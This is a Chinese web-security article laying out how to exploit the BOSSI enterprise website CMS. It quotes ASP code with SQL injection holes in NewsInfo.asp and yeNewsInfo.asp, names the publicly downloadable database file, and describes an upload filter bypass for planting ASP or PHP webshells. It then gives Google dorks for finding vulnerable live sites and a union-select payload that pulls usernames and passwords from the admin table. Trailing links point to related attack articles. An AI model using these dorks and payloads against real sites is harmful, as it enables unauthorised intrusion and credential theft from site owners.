BOSSI 公司企业网站管理系统注入&上传漏洞利用

所属分类: 网络安全 / 脚本攻防 阅读数: 1622
收藏 0 赞 0 分享
让不懂编写网页的人也可以有自己的公司(企业)网站,基本资料都在后台管理添加修改,网站的标题、地址、版权、公司邮局、收藏等资料可以在后台的"公司资料"里管理

----------------------------------------------------
漏洞一:注入漏洞,

漏洞页面:NewsInfo.asp,

漏洞代码:if not isEmpty(request.QueryString("id")) then
id=request.QueryString("id")
else
id=1
end if

Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Conews where id="&id, conn,3,3
'纪录访问次数
rs("counter")=rs("counter")+1
rs.update
nCounter=rs("counter")

id变量未处理直接代入sql查询,可注射,用啊d就行

页面二:yeNewsInfo.asp

漏洞代码:<%
if not isEmpty(request.QueryString("id")) then
id=request.QueryString("id")
else
id=1
end if

Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "Select * From Yenews where id="&id, conn,3,3
'纪录访问次数
rs("counter")=rs("counter")+1
rs.update
nCounter=rs("counter")
'定义内容
content=ubbcode(rs("content"))
%>

原理同上,可注入。

漏洞二:数据库下载漏洞

数据库地址:Database/DataShop.mdb

为建立放下载表,可任意下载!

漏洞三:上传漏洞

漏洞页面:upfile.asp ,upfilea.asp

问题代码:fileExt=lcase(file.FileExt)
   Forumupload=split(UpFileType,"|")
   for i=0 to ubound(Forumupload)
    if fileEXT=trim(Forumupload(i)) then
     EnableUpload=true
     exit for
    end if
   next
   if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
    EnableUpload=false
   end if
   if EnableUpload=false then
    msg="这种文件类型不允许上传!\n\n只允许上传这几种文件类型:" & UpFileType
    founderr=true
   end if

和那个良精的上传漏洞一样,不知道是谁抄谁的代码了!注册用户,本地上传php的大马或者加空格过滤上传asp大马,具体方法我就不说了,在浅析良精企业网站管理程序一文中提到过了!不再赘述!

漏洞利用:注入,Google:inurl:yeNewsInfo.asp?Id

注入语句:%20and%201=2%20union%20select%201,username,3,4,password%20from%20Bs_User

 

或者啊d:需要手动添加表段:Bs_User

数据库漏洞利用:

挖掘机:关键字:inurl:yeNewsInfo.asp?Id

后缀:Database/DataShop.mdb

关于上传漏洞的利用我就不演示了,可参照 浅析良精企业网站管理系统漏洞 一文。

更多精彩内容其他人还在看

PHP Webshell 下的端口反弹方法

phpspy2011 中的 Back Connect 怎么弄都不能反弹回来,在网上找了段代码,测试成功了,但自己看了下,这段代码貌似也是从 phpspy 中分离出来的
收藏 0 赞 0 分享

万博企业网站管理系统注入漏洞(MemberLogin.asp)

这个注入漏洞发生在html/MemberLogin.asp文件里,在Include下有NoSqlHack.Asp文件也没调用,呵呵,就有了我们利用的地方了
收藏 0 赞 0 分享

PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码

PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术
收藏 0 赞 0 分享

mysql注入导库脚本代码

mysql注入导库脚本代码,学习安全的朋友要注意防范。
收藏 0 赞 0 分享

BOSSI 公司企业网站管理系统注入&上传漏洞利用

BOSSI 公司(企业)网站管理系统,中英文双语版,后台在同一页内同时管理添加修改资料内的中英文内容,网站的左边栏使用了模块,可以自由的增加&删除,可以不用修改代码
收藏 0 赞 0 分享

MSSQL 2005 入侵提权过程分享

本文主要以SQL 2005提权为主,讲述过程种发现的一些问题和成功经验。至少拿到shell的过程不在细说
收藏 0 赞 0 分享

设置.net1.1 .net2.0安全 防止iisspy 防止aspx木马等

设置.net1.1 .net2.0安全 防止iisspy 防止aspx木马等,需要的朋友可以参考下。
收藏 0 赞 0 分享

PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端口

PHP Mysql 密码暴力破解,本机暴力破解 3306 端口,源码。代码简单的不能再简单了,就不解释了,功能很简单
收藏 0 赞 0 分享

PHP+MySQL手工注入语句大全 MySQL手工注入语句总结

PHP + MySQL 手工注入语句大全,MySQL 手工注入语句总结,MySQL,注入语句。暴字段长度 匹配字段 暴字段位置 利用内置函数暴数据库信息 不用猜解可用字段暴数据库信息(有些网站不适用): 操作系统信息
收藏 0 赞 0 分享

PHP 双字节、宽字节编码漏洞

PHP 双字节、宽字节编码漏洞。看了《黑防09精华》这篇《双字节编码 php的隐形杀手》,记录一下。还是用一个demo.php显示效果
收藏 0 赞 0 分享
查看更多